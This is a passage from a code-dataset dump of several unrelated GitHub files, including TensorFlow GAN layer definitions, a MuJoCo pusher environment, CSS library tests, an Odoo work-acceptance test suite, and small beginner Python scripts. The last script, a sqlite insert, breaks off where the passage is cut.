len(kernel_hw_dims) == 2\n w, w_scale = eq_lr_init_w(\n shape=[kernel_hw_dims[0], kernel_hw_dims[1], fan_in, f_maps],\n name=f\"w_conv_{block_name}\",\n storage=storage,\n )\n if add_bias:\n b = const_init_w(\n shape=[1, 1, 1, f_maps], name=f\"b_conv_{block_name}\", storage=storage\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.add(\n tf.nn.conv2d(\n x, w*w_scale, strides=[1, 1, 1, 1], padding=\"SAME\", data_format=FORMAT\n ),\n b,\n )\n\n return process\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.nn.conv2d(\n x, w*w_scale, strides=[1, 1, 1, 1], padding=\"SAME\", data_format=FORMAT\n )\n\n return process\n\n\ndef resize2d(x: tf.Tensor, scale: float = 2.0) -> tf.Tensor:\n assert scale > 0\n if scale == 1:\n return x\n\n elif scale > 1:\n # Nearest Neighbour upsampling\n scale = int(scale)\n x_shape = tf.shape(x)\n # Given that data_raw is NHWC, add dimensions after resize channels (H and W)\n x = tf.reshape(x, [-1, x_shape[1], 1, x_shape[2], 1, x_shape[3]])\n # Tile added dimensions by a scale factor to replicate H and W dims\n x = tf.tile(x, [1, 1, scale, 1, scale, 1])\n # Reshape back to original dims with H and W scaled\n x = tf.reshape(x, [-1, x_shape[1] * scale, x_shape[2] * scale, x_shape[3]])\n return x\n\n elif 0 < scale < 1:\n # Average pooling\n scale = int(1 / scale)\n return tf.nn.avg_pool(\n x,\n ksize=[1, scale, scale, 1],\n strides=[1, scale, scale, 1],\n padding=\"VALID\",\n data_format=FORMAT,\n )\n\n\ndef up_conv2d(\n fan_in: int,\n f_maps: int,\n kernel_hw_dims: tuple,\n add_bias: bool = True,\n storage: list = None,\n block_name: str = \"\",\n):\n\n assert len(kernel_hw_dims) == 2\n w, w_scale = eq_lr_init_w(\n shape=[kernel_hw_dims[0], kernel_hw_dims[1], fan_in, f_maps],\n name=f\"w_up_conv_{block_name}\",\n storage=None,\n )\n w_name = w.name\n w = tf.transpose(w, [0, 1, 3, 2])\n w = tf.pad(w, [[1, 1], [1, 1], [0, 0], [0, 0]], mode='CONSTANT')\n w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]])\n w = tf.Variable(w, trainable=True, name=w_name)\n\n if storage is not None:\n storage.append(w)\n\n if add_bias:\n b = const_init_w(\n shape=[1, 1, 1, f_maps], name=f\"b_conv_{block_name}\", storage=storage\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n out_shape = [tf.shape(x)[0], x.shape[1] * 2, x.shape[2] * 2, f_maps]\n\n return tf.add(\n tf.nn.conv2d_transpose(\n x, w*w_scale, out_shape, strides=[1, 2, 2, 1], padding=\"SAME\", data_format=FORMAT\n ),\n b,\n )\n\n return process\n\n def process(x: tf.Tensor) -> tf.Tensor:\n out_shape = [tf.shape(x)[0], x.shape[1] * 2, x.shape[2] * 2, f_maps]\n\n return tf.nn.conv2d_transpose(\n x, w*w_scale, out_shape, strides=[1, 2, 2, 1], padding=\"SAME\", data_format=FORMAT\n )\n\n return process\n\n\ndef down_conv2d(\n fan_in: int,\n f_maps: int,\n kernel_hw_dims: tuple,\n add_bias: bool = True,\n storage: list = None,\n block_name: str = \"\",\n):\n\n assert len(kernel_hw_dims) == 2\n w, w_scale = eq_lr_init_w(\n shape=[kernel_hw_dims[0], kernel_hw_dims[1], fan_in, f_maps],\n name=f\"w_down_conv_{block_name}\",\n storage=None,\n )\n w_name = w.name\n w = tf.pad(w, [[1, 1], [1, 1], [0, 0], [0, 0]], mode='CONSTANT')\n w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) * 0.25\n w = tf.Variable(w, trainable=True, name=w_name)\n\n if storage is not None:\n storage.append(w)\n\n if add_bias:\n b = const_init_w(\n shape=[1, 1, 1, f_maps], name=f\"b_conv_{block_name}\", storage=storage\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n\n return tf.add(\n tf.nn.conv2d(\n x, w*w_scale, strides=[1, 2, 2, 1], padding=\"SAME\", data_format=FORMAT\n ),\n b,\n )\n\n return process\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.nn.conv2d(\n x, w*w_scale, strides=[1, 2, 2, 1], padding=\"SAME\", data_format=FORMAT\n )\n\n return process\n\n\n# STD DEV LAYER TAKEN FROM STYLE GAN REPO =================================================\ndef std_dev_layer(x: tf.Tensor, group_size: int = 4):\n group_size = tf.minimum(group_size, tf.shape(x)[0])\n x_dim = tf.shape(x)\n # [GMHWnc] Split minibatch into M groups of size G\n y = tf.reshape(x, [group_size, -1, x_dim[1], x_dim[2], 1, x_dim[3]])\n # [GMHWnc] Subtract mean over group\n y -= tf.reduce_mean(y, axis=0, keepdims=True)\n # [MHWnc] Calc variance over group\n y = tf.reduce_mean(tf.square(y), axis=0)\n # [MHWnc] Calc stddev over group\n y = tf.sqrt(y + 1e-8)\n # [M11n1] Take average over fmaps and pixels\n y = tf.reduce_mean(y, axis=[1, 2, 4], keepdims=True)\n # [M11n]\n y = tf.reduce_mean(y, axis=[4])\n # [NHW1] Replicate over group and pixels\n y = tf.tile(y, [group_size, x_dim[1], x_dim[2], 1])\n return tf.concat([x, y], axis=3)\n# =========================================================================================\n\n\n# GAN'S BLOCKS ---\ndef to_img(\n fan_in: int, num_channels: int, block_name: str = \"to_img\", storage: list = None\n):\n conv2d_node = conv2d(\n fan_in=fan_in,\n f_maps=num_channels,\n kernel_hw_dims=(1, 1),\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return conv2d_node(x)\n\n return process\n\n\ndef from_img(\n fan_out: int, num_channels: int, block_name: str = \"from_img\", storage: list = None\n):\n conv2d_node = conv2d(\n fan_in=num_channels,\n f_maps=fan_out,\n kernel_hw_dims=(1, 1),\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return conv2d_node(x)\n\n return process\n\n\ndef affine(enc_out_dim: int, fan_out: int, block_name: str = \"affine\", storage: list = None):\n gamma_dense_1 = dense(fan_in=enc_out_dim, fan_out=256, add_bias=True, storage=storage, block_name=f\"aff_gm_1_{block_name}\")\n gamma_dense_2 = dense(fan_in=256, fan_out=fan_out, add_bias=True, storage=storage, block_name=f\"aff_gm_2_{block_name}\")\n\n beta_dense_1 = dense(fan_in=enc_out_dim, fan_out=256, add_bias=True, storage=storage, block_name=f\"aff_bt_1_{block_name}\")\n beta_dense_2 = dense(fan_in=256, fan_out=fan_out, add_bias=True, storage=storage, block_name=f\"aff_bt_2_{block_name}\")\n\n def process(x: tf.Tensor, enc_out: tf.Tensor) -> tf.Tensor:\n gamma = gamma_dense_2(tf.nn.relu(gamma_dense_1(enc_out)))\n gamma = tf.reshape(gamma, [tf.shape(gamma)[0], 1, 1, tf.shape(gamma)[1]])\n beta = beta_dense_2(tf.nn.relu(beta_dense_1(enc_out)))\n beta = tf.reshape(beta, [tf.shape(beta)[0], 1, 1, tf.shape(beta)[1]])\n\n return gamma * x + beta\n\n return process\n\n\ndef g_base_block(\n enc_out_dim: int, fan_out: int, block_name: str = \"base_block\", storage: list = None\n):\n init_x = const_init_w(shape=[1, 4, 4, 512], amp=1.0, name=\"init_w\", storage=storage)\n\n affine_node_0 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_0\"\n )\n affine_node_1 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_1\"\n )\n conv2d_node = conv2d(\n fan_in=512,\n f_maps=fan_out,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n\n def process(enc_out_flat: tf.Tensor, batch_size: int) -> tf.Tensor:\n x = tf.tile(init_x, [batch_size, 1, 1, 1])\n x = instance_norm(tf.nn.leaky_relu(x, alpha=0.2))\n x = affine_node_0(x, enc_out_flat)\n\n # Conv\n return affine_node_1(instance_norm(tf.nn.leaky_relu(conv2d_node(x), alpha=0.2)), enc_out_flat)\n\n return process\n\n\ndef c_base_block(\n fan_in: int,\n fan_out_conv: int,\n fan_mid: int,\n label_dim: int = 0,\n group_dim: int = 4,\n block_name: str = \"base_block\",\n storage: list = None,\n):\n conv_node = conv2d(\n fan_in=fan_in + 1,\n f_maps=fan_out_conv,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n dense_node = dense(\n fan_in=16 * fan_out_conv,\n fan_out=fan_mid,\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n critic_node = dense(\n fan_in=fan_mid,\n fan_out=1 + label_dim,\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_c\",\n )\n\n def process(x: tf.Tensor, enc_out: tf.Tensor) -> tf.Tensor:\n # Conv\n x = std_dev_layer(x, group_dim)\n x = tf.nn.leaky_relu(conv_node(tf.concat([x, enc_out], axis=-1)), alpha=0.2)\n\n # Critic\n x = tf.reshape(x, shape=[-1, 16 * fan_out_conv])\n x = tf.nn.leaky_relu(dense_node(x), alpha=0.2)\n return critic_node(x)\n\n return process\n\n\ndef s_base_block(\n embed_dim: int,\n fan_in: int,\n fan_out_conv: int,\n fan_mid: int,\n block_name: str = \"base_block\",\n storage: list = None,\n):\n conv_node = conv2d(\n fan_in=fan_in,\n f_maps=fan_out_conv,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n dense_node = dense(\n fan_in=16 * fan_out_conv,\n fan_out=fan_mid,\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n embed_node = dense(\n fan_in=fan_mid,\n fan_out=embed_dim,\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_s\",\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n # Conv\n x = tf.nn.leaky_relu(conv_node(x), alpha=0.2)\n\n # Critic\n x = tf.reshape(x, shape=[-1, 16 * fan_out_conv])\n x = tf.nn.leaky_relu(dense_node(x), alpha=0.2)\n return embed_node(x)\n\n return process\n\n\ndef g_block(\n fan_in: int, fan_out: int, enc_out_dim: int, block_name: str = \"block\", storage: list = None\n):\n affine_node_0 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_0\"\n )\n affine_node_1 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_1\"\n )\n conv2d_node_0 = up_conv2d(\n fan_in=fan_in,\n f_maps=fan_out,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_0\",\n )\n affine_node_2 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_2\"\n )\n affine_node_3 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_3\"\n )\n conv2d_node_1 = conv2d(\n fan_in=fan_out,\n f_maps=fan_out,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_1\",\n )\n\n def process(x: tf.Tensor, enc_out_flat: tf.Tensor) -> tf.Tensor:\n # Conv 0\n x = instance_norm(tf.nn.leaky_relu(conv2d_node_0(x), alpha=0.2))\n \n # Affine 0\n x = tf.nn.leaky_relu(affine_node_0(x, enc_out_flat), alpha=0.2)\n x = tf.nn.leaky_relu(affine_node_1(x, enc_out_flat), alpha=0.2)\n\n # Conv 1\n x = instance_norm(tf.nn.leaky_relu(conv2d_node_1(x), alpha=0.2))\n\n # Affine 1\n x = tf.nn.leaky_relu(affine_node_2(x, enc_out_flat), alpha=0.2)\n x = tf.nn.leaky_relu(affine_node_3(x, enc_out_flat), alpha=0.2)\n\n return x\n\n return process\n\n\ndef c_block(\n fan_in: int,\n fan_mid: int,\n fan_out: int,\n storage: list = None,\n block_name: str = \"block\",\n):\n conv2d_node_0 = conv2d(\n fan_in=fan_in,\n f_maps=fan_out, # fan_mid\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_0\",\n )\n conv2d_node_1 = down_conv2d(\n fan_in=fan_out,\n f_maps=fan_out,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_1\",\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n # Conv 0\n x = tf.nn.leaky_relu(conv2d_node_0(x), alpha=0.2)\n\n # Down Conv 1\n return tf.nn.leaky_relu(conv2d_node_1(x), alpha=0.2)\n\n return process\n\n\n# TEXT PREPROCESSING BLOCKS ---\ndef embedding(storage: list):\n embed_mtrx = tf.Variable(np.load(f\"{cfg.DIRS.PROC_DATA_DIR}/embed_mtrx_glove.npy\"), name=\"embed\", trainable=False)\n storage.append(embed_mtrx)\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.nn.embedding_lookup(embed_mtrx, x)\n\n return process\n\n\ndef positional_encoding(seq_len: int, seq_dim: int):\n # Compute constant positional encoding\n pos = np.arange(seq_len)[:, np.newaxis]\n idxs = np.arange(seq_dim)[np.newaxis, :]\n angles = 1.0 / np.power(10000.0, ((2*(idxs//2)) / seq_dim))\n pos_enc = pos * angles\n\n pos_enc[:, 0::2] = np.sin(pos_enc[:, 0::2])\n pos_enc[:, 1::2] = np.cos(pos_enc[:, 1::2])\n pos_enc = tf.cast(pos_enc[np.newaxis, ...], dtype=DTYPE)\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.add(x, pos_enc)\n\n return process\n\n\ndef self_attention():\n def process(q: tf.Tensor, k: tf.Tensor, v: tf.Tensor) -> tf.Tensor:\n num = tf.matmul(q, k, transpose_b=True)\n denom = tf.sqrt(tf.cast(tf.shape(k)[-1], dtype=DTYPE))\n attn_arg = num / denom\n return tf.matmul(tf.nn.softmax(attn_arg, axis=-1), v)\n\n return process\n\n\ndef multihead_attention(fan_in: int, num_heads: int, storage: list, block_name: str):\n assert fan_in % num_heads == 0\n split_dim = fan_in // num_heads\n\n q_dense = dense(fan_in=fan_in, fan_out=fan_in, add_bias=True, storage=storage, block_name=f'q_mh_attn_{block_name}')\n k_dense = dense(fan_in=fan_in, fan_out=fan_in, add_bias=True, storage=storage, block_name=f'k_mh_attn_{block_name}')\n v_dense = dense(fan_in=fan_in, fan_out=fan_in, add_bias=True, storage=storage, block_name=f'v_mh_attn_{block_name}')\n f_dense = dense(fan_in=fan_in, fan_out=fan_in, add_bias=True, storage=storage, block_name=f'f_mh_attn_{block_name}')\n\n attention_mechanism = self_attention()\n\n def _split_tensor(x: tf.Tensor, batch_size: int) -> tf.Tensor:\n shape = [batch_size, -1, num_heads, split_dim]\n x = tf.reshape(x, shape=shape)\n return tf.transpose(x, perm=[0, 2, 1, 3])\n\n def process(x: tf.Tensor):\n batch_size = int(tf.shape(x)[0])\n\n q = _split_tensor(q_dense(x), batch_size)\n k = _split_tensor(k_dense(x), batch_size)\n v = _split_tensor(v_dense(x), batch_size)\n\n attn = attention_mechanism(q, k, v)\n attn = tf.transpose(attn, perm=[0, 2, 1, 3])\n attn = tf.reshape(attn, shape=[batch_size, -1, fan_in])\n return f_dense(attn)\n\n return process\n\n\ndef seq_proc_block(fan_in: int, fan_mid: int, num_attn_heads: int, storage: list, block_name: str):\n mh_attn = multihead_attention(\n fan_in=fan_in, num_heads=num_attn_heads, storage=storage, block_name=block_name\n )\n dense1 = dense(fan_in=fan_in, fan_out=fan_mid, add_bias=True, storage=storage, block_name=f\"1_{block_name}\")\n dense2 = dense(fan_in=fan_mid, fan_out=fan_in, add_bias=True, storage=storage, block_name=f\"2_{block_name}\")\n\n def process(x: tf.Tensor):\n x = pixel_norm(mh_attn(x) + x)\n\n x_proc = tf.nn.leaky_relu(dense1(x), alpha=0.2)\n x_proc = tf.nn.leaky_relu(dense2(x_proc), alpha=0.2)\n return pixel_norm(x + x_proc)\n\n return process\n\n\ndef seq2channel_attn(fan_in: int, fan_mid: int, num_channels: int, storage: list):\n reduce_dense_1 = dense(fan_in=fan_in, fan_out=fan_mid, add_bias=True, storage=storage, block_name=\"reduce_1\")\n reduce_dense_2 = dense(fan_in=fan_mid, fan_out=16, add_bias=True, storage=storage, block_name=\"reduce_2\")\n\n attn_dense_1 = dense(fan_in=16, fan_out=32, add_bias=True, storage=storage, block_name=\"seq2chn_1\")\n attn_dense_2 = dense(fan_in=32, fan_out=num_channels, add_bias=True, storage=storage, block_name=\"seq2chn_2\")\n\n def process(x: tf.Tensor) -> tf.Tensor:\n # Reduce tensor dimensionality from [NxTxD1] to [NxTxD], where D << D1\n x = pixel_norm(tf.nn.leaky_relu(reduce_dense_1(x)))\n x = pixel_norm(tf.nn.leaky_relu(reduce_dense_2(x)))\n\n # Compute [NxTxC] tensor of sequence attn weights per every channel c_n\n alphas = tf.nn.softmax(attn_dense_2(tf.nn.leaky_relu(attn_dense_1(x), alpha=0.2)), axis=1)\n\n # Weight reduced tensor to [NxDxC] as attn weighted sum of sequences per channel\n x = tf.matmul(tf.transpose(x, perm=[0, 2, 1]), alphas)\n\n # Reshape tensor fo feature maps [N, C]\n return tf.reduce_mean(x, axis=1)\n\n return process\n","repo_name":"vrobell/txt2img_gan","sub_path":"blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":18348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39719491174","text":"import numpy as np\nfrom gym import utils\nfrom gym.envs.mujoco import mujoco_env\n\nimport mujoco_py\n\nclass PusherEnv(mujoco_env.MujocoEnv, utils.EzPickle):\n def __init__(self):\n utils.EzPickle.__init__(self)\n mujoco_env.MujocoEnv.__init__(self, 'pusher.xml', 5)\n\n def step(self, a):\n vec_1 = self.get_body_com(\"object\") - self.get_body_com(\"tips_arm\")\n vec_2 = self.get_body_com(\"object\") - self.get_body_com(\"goal\")\n\n reward_near = - np.linalg.norm(vec_1)\n reward_dist = - np.linalg.norm(vec_2)\n reward_ctrl = - np.square(a).sum()\n reward = reward_dist + 0.1 * reward_ctrl + 0.5 * reward_near\n\n self.do_simulation(a, self.frame_skip)\n ob = self._get_obs()\n done = False\n return ob, reward, done, dict(reward_dist=reward_dist,\n reward_ctrl=reward_ctrl)\n\n def viewer_setup(self):\n self.viewer.cam.trackbodyid = -1\n self.viewer.cam.distance = 4.0\n\n def reset_model(self):\n qpos = self.init_qpos\n\n self.goal_pos = np.asarray([0, 0])\n while True:\n self.cylinder_pos = np.concatenate([\n self.np_random.uniform(low=-0.3, high=0, size=1),\n self.np_random.uniform(low=-0.2, high=0.2, size=1)])\n if np.linalg.norm(self.cylinder_pos - self.goal_pos) > 0.17:\n break\n\n qpos[-4:-2] = self.cylinder_pos\n qpos[-2:] = self.goal_pos\n qvel = self.init_qvel + self.np_random.uniform(low=-0.005,\n high=0.005, size=self.model.nv)\n qvel[-4:] = 0\n self.set_state(qpos, qvel)\n return self._get_obs()\n\n def _get_obs(self):\n return np.concatenate([\n self.sim.data.qpos.flat[:7],\n self.sim.data.qvel.flat[:7],\n self.get_body_com(\"tips_arm\"),\n self.get_body_com(\"object\"),\n self.get_body_com(\"goal\"),\n ])\n","repo_name":"AI4Finance-Foundation/FinRL-Tutorials","sub_path":"DQN-DDPG_Stock_Trading/gym/envs/mujoco/pusher.py","file_name":"pusher.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":599,"dataset":"github-code","pt":"18"} +{"seq_id":"71829833641","text":"from chope.css import Css, px, rem, percent, in_\n\nexpected = '''h1 {\n color: red;\n font-size: 1.2rem;\n padding: 1in;\n margin: 2%;\n outline: 1px dotted green;\n}\n\n.my-class {\n background: black;\n}'''\n\n\ndef test_should_render_css_correctly():\n style = Css[\n 'h1': dict(\n color='red',\n font_size=rem/1.2,\n padding=in_/1,\n margin=percent/2,\n outline=(px/1, 'dotted', 'green')\n ),\n '.my-class': dict(\n background='black'\n )\n ]\n\n assert style.render(3) == expected\n\ndef test_when_indent_is_zero_should_render_flat_string():\n expected = 'a {b: c;}d {e: f;}'\n\n style = Css['a': dict(b='c'), 'd': dict(e='f')]\n\n assert style.render(0) == expected\n","repo_name":"hanstjua/chope","sub_path":"tests/test_css.py","file_name":"test_css.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"34975676250","text":"import networkx as nx\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom get_model_parameters import get_marriage_distances_kolton, test_find_distances_bio\nnodes = [1, 2, 4, 5, 6, 7, 10, 11, 14, 15, 18, 19, 22, 23]\nparent_child_edges = [(22, 18), (22,19), (18, 14),\n (19, 15), (14, 10),\n (15, 11), (10, 4), (10, 5),\n (11, 6), (11, 7), (4,1), (5,23),\n (6, 23), (7, 2)]\nmarriage_edges = [(5,6), (1,2)]\nG = nx.DiGraph()\nG.add_nodes_from(nodes)\nG.add_edges_from(parent_child_edges)\n\n\ndistances, num_inf_marriages, percent_inf_marraiges = get_marriage_distances_kolton(G, marriage_edges, plot=True)\ndistances\ndistances2, count2 = test_find_distances_bio(G, parent_child_edges, marriage_edges)\ndistances2\nplt.hist(distances2, bins=[k for k in range(max(distances2) + 2)], range=(0, max(distances) + 2))\n","repo_name":"js-808/FamilyNetworksResearch","sub_path":"Model/counter_example.py","file_name":"counter_example.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32366465017","text":"from odoo import fields\nfrom odoo.exceptions import ValidationError\nfrom odoo.tests.common import Form, TransactionCase\n\n\nclass TestGovPurchaseWorkAcceptance(TransactionCase):\n def setUp(self):\n super().setUp()\n # Model\n self.purchase_request_model = self.env[\"purchase.request\"]\n self.purchase_order_model = self.env[\"purchase.order\"]\n self.procurement_committee_model = self.env[\"procurement.committee\"]\n self.config_setting = self.env[\"res.config.settings\"]\n self.wiz = self.env[\"purchase.request.line.make.purchase.requisition\"]\n # Data Test\n self.product1 = self.env.ref(\"product.product_product_7\")\n self.procurement_type1 = self.env.ref(\n \"l10n_th_gov_purchase_request.procurement_type_001\"\n )\n self.procurement_method1 = self.env.ref(\n \"l10n_th_gov_purchase_request.procurement_specific\"\n )\n self.purchase_type3 = self.env.ref(\n \"l10n_th_gov_purchase_request.purchase_type_003\"\n )\n self.pr_exception = self.env.ref(\"l10n_th_gov_purchase_request.pr_exception_4\")\n self.employee = self.env.ref(\"base.user_demo\")\n self.employee1 = self.env.ref(\"hr.employee_hne\")\n self.employee2 = self.env.ref(\"hr.employee_lur\")\n self.employee3 = self.env.ref(\"hr.employee_jgo\")\n self.res_partner = self.env.ref(\"base.res_partner_12\")\n self.date_now = fields.Datetime.now()\n self.main_company = self.env.ref(\"base.main_company\")\n\n # Enable WA Evaluation\n with Form(self.config_setting) as c:\n c.group_enable_eval_on_wa = True\n c.save()\n self.config_setting.create({\"group_enable_eval_on_wa\": True}).execute()\n\n def _create_work_acceptance(self, qty, po=False, committees=False):\n work_acceptance = self.env[\"work.acceptance\"].create(\n {\n \"purchase_id\": po and po.id or False,\n \"partner_id\": self.res_partner.id,\n \"responsible_id\": self.employee.id,\n \"date_due\": self.date_now,\n \"date_receive\": self.date_now,\n \"company_id\": self.main_company.id,\n \"wa_line_ids\": [\n (\n 0,\n 0,\n {\n \"purchase_line_id\": po and po.order_line[0].id or False,\n \"product_id\": po\n and po.order_line[0].product_id.id\n or self.service_product.id,\n \"name\": po\n and po.order_line[0].name\n or self.service_product.name,\n \"price_unit\": po\n and po.order_line[0].price_unit\n or self.service_product.standard_price,\n \"product_uom\": po\n and po.order_line[0].product_uom.id\n or self.service_product.uom_id.id,\n \"product_qty\": qty,\n },\n )\n ],\n \"work_acceptance_committee_ids\": committees,\n }\n )\n return work_acceptance\n\n def test_01_gov_purchase_request_to_work_acceptance(self):\n \"\"\"Process Purchase Request until work acceptance and committee must approve WA\"\"\"\n committees = [\n (\n 0,\n 0,\n {\n \"employee_id\": self.employee1.id,\n \"approve_role\": \"chairman\",\n \"committee_type\": \"work_acceptance\",\n },\n ),\n (\n 0,\n 0,\n {\n \"employee_id\": self.employee2.id,\n \"approve_role\": \"committee\",\n \"committee_type\": \"work_acceptance\",\n },\n ),\n (\n 0,\n 0,\n {\n \"employee_id\": self.employee3.id,\n \"approve_role\": \"committee\",\n \"committee_type\": \"work_acceptance\",\n },\n ),\n ]\n purchase_request = self.purchase_request_model.create(\n {\n \"procurement_type_id\": self.procurement_type1.id,\n \"procurement_method_id\": self.procurement_method1.id,\n \"line_ids\": [\n (\n 0,\n 0,\n {\n \"estimated_cost\": 100.0,\n \"product_qty\": 1,\n \"product_id\": self.product1.id,\n \"product_uom_id\": self.env.ref(\"uom.product_uom_unit\").id,\n },\n )\n ],\n \"work_acceptance_committee_ids\": committees,\n }\n )\n purchase_request.button_to_approve()\n purchase_request.with_context(to_substate_sequence=20).action_to_substate()\n purchase_request.button_approved()\n # Create purchase agreement from purchase request\n wiz = self.wiz.with_context(\n active_model=\"purchase.request.line\",\n active_ids=[purchase_request.line_ids.id],\n active_id=purchase_request.line_ids.id,\n ).create({})\n wiz.make_purchase_requisition()\n purchase_request_line = purchase_request.line_ids\n requisition = purchase_request_line.requisition_lines.requisition_id\n requisition_line = requisition.line_ids\n requisition_line.price_unit = 100.0\n requisition.action_in_progress()\n requisition.action_open()\n # Create Purchase from Agreement\n purchase = self.purchase_order_model.create(\n {\n \"partner_id\": self.res_partner.id,\n \"requisition_id\": requisition.id,\n }\n )\n purchase._onchange_requisition_id()\n purchase.button_confirm()\n # Check WA default\n res = purchase.with_context(create_wa=True).action_view_wa()\n ctx = res.get(\"context\")\n work_acceptance = Form(self.env[\"work.acceptance\"].with_context(ctx))\n self.assertEqual(work_acceptance.state, \"draft\")\n self.assertEqual(len(work_acceptance.work_acceptance_committee_ids), 3)\n self.assertTrue(work_acceptance.wa_tier_validation)\n for committee in committees:\n del committee[2][\"committee_type\"]\n work_acceptance = self._create_work_acceptance(1, purchase, committees)\n eval_resuls = work_acceptance.evaluation_result_ids\n # Set score evaluation\n eval_resuls[0].score_id = eval_resuls[0].case_id.score_ids[0]\n eval_resuls[1].score_id = eval_resuls[1].case_id.score_ids[0]\n eval_resuls[2].score_id = eval_resuls[2].case_id.score_ids[0]\n eval_resuls[3].score_id = eval_resuls[3].case_id.score_ids[0]\n eval_resuls[4].score_id = eval_resuls[4].case_id.score_ids[0]\n eval_resuls[5].score_id = eval_resuls[5].case_id.score_ids[0]\n # Paperless must tier validation first\n with self.assertRaises(ValidationError):\n work_acceptance.button_accept()\n # Check exception in process tier validation\n res = work_acceptance._get_under_validation_exceptions()\n self.assertEqual(\"evaluation_result_ids\", res[-1])\n # Start Tier Validation\n work_acceptance.request_validation()\n work_acceptance.invalidate_cache() # Needed to refresh review_ids field\n work_acceptance.review_ids.write({\"status\": \"approved\"})\n # Normally, this function will automate from tier server action\n work_acceptance.work_acceptance_committee_ids.write({\"status\": \"accept\"})\n self.assertEqual(work_acceptance.completeness, 100.0)\n # Test restart tier, status and note must be clear\n self.assertTrue(work_acceptance.work_acceptance_committee_ids[0].status)\n work_acceptance.restart_validation()\n self.assertFalse(work_acceptance.work_acceptance_committee_ids[0].status)\n\n work_acceptance.request_validation()\n work_acceptance.invalidate_cache() # Needed to refresh review_ids field\n work_acceptance.review_ids.write({\"status\": \"approved\"})\n work_acceptance.work_acceptance_committee_ids.write({\"status\": \"accept\"})\n work_acceptance.button_accept()\n self.assertEqual(work_acceptance.state, \"accept\")\n","repo_name":"OCA/l10n-thailand","sub_path":"l10n_th_gov_work_acceptance/tests/test_gov_purchase_work_acceptance.py","file_name":"test_gov_purchase_work_acceptance.py","file_ext":"py","file_size_in_byte":8594,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"18"} +{"seq_id":"38542476295","text":"import os\r\nos.chdir(\"D:\\\\\")\r\nmyFile = open(\"new 4.txt\",encoding= 'utf-8')\r\nmyContent = myFile.readlines()\r\nsumctm = 0\r\ncount = 0\r\nfor x in myContent:\r\n x=str(x)\r\n y = x.find('资产信息表中的每支股票的交易费用: ')\r\n ctms = x[y+18:-1]\r\n sumctm = sumctm+float(ctms)\r\n\r\n print(sumctm)\r\n\r\n\r\n\r\n","repo_name":"maodan-maodan/test","sub_path":"OKR项目实践/平均值1.py","file_name":"平均值1.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38814438155","text":"\n\n\ndef split_function(dict):\n no_of_person = 5\n arr = []\n string1 = input(\"Enter the element\")\n\n split1 = string1.split(\",\")\n for i in split1:\n if arr[i] == dict.keys():\n dict.update(arr[i + 1])\n print(dict)\n\nsplit_function({'A': 0, 'B': 0, 'C': 0, 'D': 0, 'E': 0})\n","repo_name":"Udhaya19/python-beginner","sub_path":"Day7/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39803015750","text":"import sqlite3\nimport datetime\n\ndef addImage(image_name, present_teeth_text):\n # Connecting to database\n conn = sqlite3.connect(\"db.sqlite3\")\n c = conn.cursor()\n\n now = datetime.datetime.now()\n input_image = \"Images/{}.jpg\".format(image_name)\n output_image = \"OutputImages/{}.jpg\".format(image_name)\n thresh_image = \"ThreshImages/Images/{}.jpg\".format(image_name_text)\n \n c.execute(\n \"INSERT INTO imageDisp_pantomograminfo 